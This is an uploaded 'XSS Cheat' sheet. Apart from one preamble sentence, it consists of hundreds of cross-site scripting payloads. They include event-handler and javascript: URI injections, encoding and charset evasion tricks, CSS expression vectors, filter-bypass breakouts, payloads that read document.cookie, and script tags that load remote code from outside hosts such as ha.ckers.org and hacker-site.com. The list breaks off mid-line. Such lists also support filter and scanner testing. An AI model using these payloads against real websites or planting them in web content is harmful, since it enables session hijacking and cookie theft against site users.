XSS Cheat

The document contains numerous examples of potential XSS (cross-site scripting) vulnerabilities through the use of malicious JavaScript code embedded in various HTML elements, attributes, and encoding techniques. The goal is to execute arbitrary JavaScript in a user's browser by exploiting vulnerabilities on websites.

Uploaded by joseph

<body oninput=javascript:alert(1)><input autofocus> <math

href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction


actiontype="statusline#http://google.com"
xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> <frameset
onload=javascript:alert(1)> <table background="javascript:javascript:alert(1)">
<!--<img src="--><img src=x onerror=javascript:alert(1)//"> <comment><img
src="</comment><img src=x onerror=javascript:alert(1))//"> <![><img src="]><img
src=x onerror=javascript:alert(1)//"> <style><img src="</style><img src=x
onerror=javascript:alert(1)//"> <li style=list-style:url()
onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%
%3E);visibility:hidden onload=javascript:alert(1)></div> <head><base
href="javascript://"></head><body><a href="/.
/,javascript:alert(1)//#">XXX</a></body> <SCRIPT FOR=document
EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> <OBJECT
CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL"
VALUE="javascript:alert(1)"></OBJECT> <object data="data:text/html;base64,%
(base64)s"> <embed src="data:text/html;base64,%(base64)s"> <b
<script>alert(1)</script>0 <div id="div1"><input
value="``onmouseover=javascript:alert(1)"></div> <div
id="div2"></div><script>document.getElementById("div2").innerHTML =
document.getElementById("div1").innerHTML;</script> <x '="foo"><x foo='><img src=x
onerror=javascript:alert(1)//'> <embed src="javascript:alert(1)"> <img
src="javascript:alert(1)"> <image src="javascript:alert(1)"> <script
src="javascript:alert(1)"> <div style=width:1px;filter:glow
onfilterchange=javascript:alert(1)>x <?
foo="><script>javascript:alert(1)</script>"> <!
foo="><script>javascript:alert(1)</script>"> </
foo="><script>javascript:alert(1)</script>"> <? foo="><x foo='?
><script>javascript:alert(1)</script>'>"> <! foo="[[[Inception]]"><x
foo="]foo><script>javascript:alert(1)</script>"> <% foo><x
foo="%><script>javascript:alert(1)</script>"> <div id=d><x xmlns="><iframe
onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> <img
\x00src=x onerror="alert(1)"> <img \x47src=x onerror="javascript:alert(1)"> <img
\x11src=x onerror="javascript:alert(1)"> <img \x12src=x
onerror="javascript:alert(1)"> <img\x47src=x onerror="javascript:alert(1)">
<img\x10src=x onerror="javascript:alert(1)"> <img\x13src=x
onerror="javascript:alert(1)"> <img\x32src=x onerror="javascript:alert(1)">
<img\x47src=x onerror="javascript:alert(1)"> <img\x11src=x
onerror="javascript:alert(1)"> <img \x47src=x onerror="javascript:alert(1)">
<img \x34src=x onerror="javascript:alert(1)"> <img \x39src=x
onerror="javascript:alert(1)"> <img \x00src=x onerror="javascript:alert(1)"> <img
src\x09=x onerror="javascript:alert(1)"> <img src\x10=x
onerror="javascript:alert(1)"> <img src\x13=x onerror="javascript:alert(1)"> <img
src\x32=x onerror="javascript:alert(1)"> <img src\x12=x
onerror="javascript:alert(1)"> <img src\x11=x onerror="javascript:alert(1)"> <img
src\x00=x onerror="javascript:alert(1)"> <img src\x47=x
onerror="javascript:alert(1)"> <img src=x\x09onerror="javascript:alert(1)"> <img
src=x\x10onerror="javascript:alert(1)"> <img
src=x\x11onerror="javascript:alert(1)"> <img
src=x\x12onerror="javascript:alert(1)"> <img
src=x\x13onerror="javascript:alert(1)"> <img[a][b]
[c]src[d]=x[e]onerror=[f]"alert(1)"> <img src=x onerror=\x09"javascript:alert(1)">
<img src=x onerror=\x10"javascript:alert(1)"> <img src=x
onerror=\x11"javascript:alert(1)"> <img src=x onerror=\x12"javascript:alert(1)">
<img src=x onerror=\x32"javascript:alert(1)"> <img src=x
onerror=\x00"javascript:alert(1)"> <a
href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> <img
src="x` `<script>javascript:alert(1)</script>"` `> <img src onerror /" '"=
alt=javascript:alert(1)//"> <title
onpropertychange=javascript:alert(1)></title><title title=> <a
href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x
onerror=javascript:alert(1)></a>"> <!--[if]><script>javascript:alert(1)</script -->
<!--[if<img src=x onerror=javascript:alert(1)//]> --> <script src="/\%
(jscript)s"></script> <script src="\\%(jscript)s"></script> <object id="x"
classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object
classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param
name=postdomevents /></object> <a style="-o-link:'javascript:javascript:alert(1)';-
o-link-source:current">X <style>p[foo=bar{}*{-o-
link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]
{color:red};</style> <link rel=stylesheet href=data:,*
%7bx:expression(javascript:alert(1))%7d <style>@import "data:,*
%7bx:expression(javascript:alert(1))%7D";</style> <a style="pointer-
events:none;position:absolute;"><a style="position:absolute;"
onclick="javascript:alert(1);">XXX</a></a><a
href="javascript:javascript:alert(1)">XXX</a> <style>*[{}@import'%(css)s?]</style>X
<div style="font-family:'foo&#10;;color:red;';">XXX <div style="font-
family:foo}color=red;">XXX <// style=x:expression\28javascript:alert(1)\29>
<style>*{x:expression(javascript:alert(1))}</style> <div style=content:url(%
(svg)s)></div> <div style="list-
style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X <div id=d><div
style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div>
<script>with(document.getElementById("d"))innerHTML=innerHTML</script> <div
style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X <div style="font-
family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X <div
id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{}
</style> <x style="background:url('x&#1;;color:red;/*')">XXX</x> <script>({set/**/$
($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function()
{javascript:alert(1)}),x</script> <script>Object.__noSuchMethod__ = Function,[{}]
[0].constructor._('javascript:alert(1)')()</script> <meta charset="x-imap4-
modified-
utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlA
HIAdAAoADEAKQ&ACAAPABi <meta charset="x-imap4-modified-
utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> <meta charset="mac-
farsi">¼script¾javascript:alert(1)¼/script¾ X<x
style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
1<set/xmlns=`urn:schemas-microsoft-com:time`
style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml`
to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> <IMG
SRC="jav&#x0D;ascript:alert('XSS');"> perl -e 'print "<IMG
SRC=java\0script:alert(\"XSS\")>";' > out <IMG SRC=" &#14;
javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert('XSS')" <iframe
src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT> <INPUT TYPE="IMAGE"
SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"> <IMG
DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <STYLE>li
{list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> <IMG
SRC='vbscript:msgbox("XSS")'> <IMG SRC="livescript:[code]"> <BODY
ONLOAD=alert('XSS')> <BGSOUND SRC="javascript:alert('XSS');"> <BR
SIZE="&{alert('XSS')}"> <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link"
Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-
binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG
STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> exp/*<A
STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> <STYLE
TYPE="text/javascript">alert('XSS');</STYLE> <STYLE>.XSS{background-
image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE
type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <STYLE
type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <XSS
STYLE="xss:expression(alert('XSS'))"> <XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾ <META HTTP-EQUIV="refresh"
CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=#
onmouseover="alert(document.cookie)"></IFRAME> <FRAMESET><FRAME
SRC="javascript:alert('XSS');"></FRAMESET> <TABLE
BACKGROUND="javascript:alert('XSS')"> <TABLE><TD
BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image:
url(javascript:alert('XSS'))"> <DIV STYLE="background-
image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\
0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV
STYLE="background-image: url(&#1;javascript:alert('XSS'))"> <DIV STYLE="width:
expression(alert('XSS'));"> <BASE HREF="javascript:alert('XSS');//"> <OBJECT
TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <SCRIPT
SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCR'"--
><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> <?
echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> <IMG
SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-
EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> <HEAD><META
HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-
SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT a=">"
SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT =">"
SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" ''
SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'"
SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>`
SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>"
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A
HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="htt p://6
6.000146.0x7.147/">XSS</A> <iframe src="&Tab;javascript:prompt(1)&Tab;">
<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" <sVg><scRipt
>alert&lpar;1&rpar; {Opera} <img/src=`` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript&colon;confirm(1)" <img src=``&NewLine;
onerror=alert(1)&NewLine; <script/&Tab;
src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> <ScRipT 5-
0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /**/>/**/alert(1)/**/</script /**/
&#34;&#62;<h1/onmouseover='\u0061lert(1)'> <iframe/src="data:text/html,<svg
&#111;&#110;load=alert(1)>"> <meta content="&NewLine; 1 &NewLine;;
JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> <svg><script
xlink:href=data&colon;,window.open('https://www.google.com/')></script <svg><script
x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh"
content="0;url=javascript:confirm(1)"> <iframe
src=javascript&colon;alert&lpar;document&period;location&rpar;> <form><a
href="javascript:\u0061lert&#x28;1&#x29;">X
</script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'
> <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)> <form><iframe &#09;&#10;&#11;
src="javascript&#58;alert(1)"&#11;&#10;&#09;;> <a href="data:application/x-x509-
user-
cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>
X</a http://www.google<script .com>alert(document.location)</script
<a&#32;href&#61;&#91;&#00;&#93;"&#00;
onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a <img/src=@&#32;&#13; onerror =
prompt('&#49;') <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;<script
^__^>alert(String.fromCharCode(49))</script ^__^ </style &#32;><script &#32; :-
(>/**/alert(document.location)/**/</script &#32; :-( &#00;</form><input
type&#61;"date" onfocus="alert(1)"> <form><textarea &#13;
onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> <script
/***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script
/***/ <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> <a
href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
<script ~~~>alert(0%0)</script ~~~> <style/onload=&lt;!--
&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> <///style///><span %2F
onmousemove='alert&lpar;1&rpar;'>SPAN <img/src='http://i.imgur.com/P8mL8.jpg'
onmouseover=&Tab;prompt(1) &#34;&#62;<svg><style>{-o-link-
source&colon;'<body/onload=confirm(1)>' &#13;<blink/&#13;
onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} <marquee
onstart='javascript:alert&#x28;1&#x29;'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7} <iframe//
src=javaSCRIPT&colon;alert(1)
//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type=
'submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1)
/*iframe/src*/> //|\\ <script //|\\
src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</styl
e> <a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
</plaintext\></|\><plaintext/onmouseover=prompt(1) </svg>''<svg><script
'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} <a
href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> <div
onmouseover='alert&lpar;1&rpar;'>DIV</div> <iframe
style="position:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)"> <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> <embed
src="http://corkami.googlecode.com/svn/!
svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object
data="http://corkami.googlecode.com/svn/!
svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <var onmouseover="prompt(1)">On
Mouse Over</var> <a
href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> <img
src="/" =_=" title="onerror='prompt(1)'"> <%<!--'%><script>alert(1);</script -->
<script src="data:text/javascript,alert(1)"></script> <iframe/src \/\/onload =
prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input
value=<><iframe/src=javascript:confirm(1) <input type="text" value=``
<div/onmouseover='alert(1)'>X</div> <iframe
src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;
r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> <img src=`xx:xx`onerror=alert(1)> <object
type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> <meta http-
equiv="refresh" content="0;javascript&colon;alert(1)"/> <math><a
xlink:href="//jsfiddle.net/t846h/">click <embed
code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg
contentScriptType=text/vbs><script>MsgBox+1 <a
href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073.
\u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/src="data&colon;text
%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C
%65%72%74(/XSS/)></script <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
<script>+-+-1-+-+alert(1)</script> <body/onload=&lt;!--&gt;&#10alert(1)> <script
itworksinallbrowsers>/*<script* */alert(1)</script <img src ?
itworksonchrome?\/onerror = alert(1) <svg><script>//&NewLine;confirm(1);</script
</svg> <svg><script onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa
aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa
href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe <script x> alert(1) </script 1=2
<div/onmouseover='alert(1)'> style="x:"> <--`<img/src=` onerror=alert(1)> --!>
<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x0000
70&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> <div
style="position:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)" onclick="alert(1)">x</button> "><img src=x
onerror=window.open('https://www.google.com/');> <form><button
formaction=javascript&colon;alert(1)>CLICKME <math><a
xlink:href="//jsfiddle.net/t846h/">click <object
data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe
src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F
%73%63%72%69%70%74%3E"></iframe> <a
href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61
&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#1
05&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#1
15&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> '';!--"<XSS>=&{()}
'>//\\,<'>">">"*" '); alert('XSS <script>alert(1);</script>
<script>alert('XSS');</script> <IMG SRC="javascript:alert('XSS');"> <IMG
SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG
SRC=javascript:alert(&quot;XSS&quot;)> <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<scr<script>ipt>alert('XSS');</scr</script>ipt>
<script>alert(String.fromCharCode(88,83,83))</script> <img src=foo.png
onerror=alert(/xssed/) /> <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> <?
echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
<marquee><script>alert('XSS')</script></marquee> <IMG
SRC=\"jav&#x09;ascript:alert('XSS');\"> <IMG
SRC=\"jav&#x0A;ascript:alert('XSS');\"> <IMG
SRC=\"jav&#x0D;ascript:alert('XSS');\"> <IMG
SRC=javascript:alert(String.fromCharCode(88,83,83))> "><script>alert(0)</script>
<script src=http://yoursite.com/your_files.js></script>
</title><script>alert(/xss/)</script> </textarea><script>alert(/xss/)</script> <IMG
LOWSRC=\"javascript:alert('XSS')\"> <IMG DYNSRC=\"javascript:alert('XSS')\"> <font
style='color:expression(alert(document.cookie))'> <img
src="javascript:alert('XSS')"> <script language="JavaScript">alert('XSS')</script>
<body onunload="javascript:alert('XSS');"> <body onLoad="alert('XSS');" [color=red'
onmouseover="alert('xss')"]mouse over[/color] "/></a></><img src=1.gif
onerror=alert(1)> window.alert("Bonjour !"); <div
style="x:expression((window.r==1)?'':eval('r=1;
alert(String.fromCharCode(88,83,83));'))"> <iframe<?php echo chr(11)?>
onload=alert('XSS')></iframe> "><script
alert(String.fromCharCode(88,83,83))</script> '>><marquee><h1>XSS</h1></marquee>
'">><script>alert('XSS')</script> '">><marquee><h1>XSS</h1></marquee> <META HTTP-
EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"> <META HTTP-
EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
<script>var var = 1; alert(var)</script>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <?
='<SCRIPT>alert("XSS")</SCRIPT>'?> <IMG SRC='vbscript:msgbox(\"XSS\")'> "
onfocus=alert(document.domain) "> <" <FRAMESET><FRAME
SRC=\"javascript:alert('XSS');\"></FRAMESET> <STYLE>li {list-style-image:
url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS perl -e
'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out perl -e 'print \"<IMG
SRC=java\0script:alert(\"XSS\")>\";' > out <br size=\"&{alert('XSS')}\">
<scrscriptipt>alert(1)</scrscriptipt> </br style=a:expression(alert())>
</script><script>alert(1)</script> "><BODY onload!#$%&()*~+-_.,:;?
@[/|\]^`=alert("XSS")> [color=red width=expression(alert(123))][color] <BASE
HREF="javascript:alert('XSS');//"> Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
"></iframe><script>alert(123)</script> <body onLoad="while(true) alert('XSS');">
'"></title><script>alert(1111)</script>
</textarea>'"><script>alert(document.cookie)</script> '""><script
language="JavaScript"> alert('X \nS \nS');</script>
</script></script><<<<script><>>>><<<script>alert(123)</script>
<html><noalert><noscript>(123)</noscript><script>(123)</script> <INPUT TYPE="IMAGE"
SRC="javascript:alert('XSS');"> '></select><script>alert(123)</script> '>"><script
src = 'http://www.site.com/XSS.js'></script> }
</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
<SCRIPT>document.write("XSS");</SCRIPT>
a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
='><script>alert("xss")</script> <script+src=">"+src="http://yoursite.com/xss.js?
69,69"></script> <body
background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
">/XaDoS/><script>alert(document.cookie)</script><script
src="http://www.site.com/XSS.js"></script> ">/KinG-
InFeT.NeT/><script>alert(document.cookie)</script>
src="http://www.site.com/XSS.js"></script> data:text/html;charset=utf-
7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4= !--"
/><script>alert('xss');</script> <script>alert("XSS by
\nxss")</script><marquee><h1>XSS by xss</h1></marquee> "><script>alert("XSS by
\nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
'"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by
xss</h1></marquee> <img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS
by xss</h1></marquee> <script>alert(1337)</script><marquee><h1>XSS by
xss</h1></marquee> "><script>alert(1337)</script>"><script>alert("XSS by
\nxss</h1></marquee> '"></title><script>alert(1337)</script>><marquee><h1>XSS by
xss</h1></marquee> <iframe src="javascript:alert('XSS by
\nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee>
'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt='
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src=""
alt=" \'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'
http://www.simpatie.ro/index.php?
page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS??
http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS?? ');
alert('xss'); var x=' \\'); alert(\'xss\');var x=\'
//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83)); >"><ScRiPt%20%0a
%0d>alert(561177485777)%3B</ScRiPt>
</body> </html> <SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT> <SCRIPT>
alert(“XSS”); </SCRIPT> <BODY ONLOAD=alert("XSS")> <BODY
BACKGROUND="javascript:alert('XSS')"> <IMG SRC="javascript:alert('XSS');"> <IMG
DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <IFRAME
SRC=”http://hacker-site.com/xss.html”> <INPUT TYPE="IMAGE"
SRC="javascript:alert('XSS');"> <LINK REL="stylesheet"
HREF="javascript:alert('XSS');"> <TABLE BACKGROUND="javascript:alert('XSS')"> <TD
BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image:
url(javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));">
<OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html"> <EMBED
SRC="http://hacker.com/xss.swf" AllowScriptAccess="always">
&apos;;alert(String.fromCharCode(88,83,83))//\&apos;;alert(String.fromCharCode(88,8
3,83))//&quot;;alert(String.fromCharCode(88,83,83))//\&quot;;alert(String.fromCharC
ode(88,83,83))//--
&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,8
3,83))&lt;/SCRIPT&gt; &apos;&apos;;!--&quot;&lt;XSS&gt;=&amp;{()}
&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt; &lt;SCRIPT
SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt; &lt;BASE
HREF=&quot;javascript:alert(&apos;XSS&apos;);//&quot;&gt; &lt;BGSOUND
SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; &lt;BODY
BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; &lt;BODY
ONLOAD=alert(&apos;XSS&apos;)&gt; &lt;DIV STYLE=&quot;background-image:
url(javascript:alert(&apos;XSS&apos;))&quot;&gt; &lt;DIV STYLE=&quot;background-
image: url(&amp;#1;javascript:alert(&apos;XSS&apos;))&quot;&gt; &lt;DIV
STYLE=&quot;width: expression(alert(&apos;XSS&apos;));&quot;&gt;%253Cscript
%253Ealert('XSS')%253C%252Fscript%253E <IMG SRC=x
onload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onafterprint="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onbeforeprint="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onbeforeunload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onerror="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onhashchange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onmessage="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
ononline="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onoffline="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onpagehide="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onpageshow="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onpopstate="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onresize="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onstorage="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onunload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onblur="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onchange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
oncontextmenu="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
oninput="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
oninvalid="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onreset="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onsearch="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onselect="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onsubmit="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onkeydown="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
onkeypress="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x
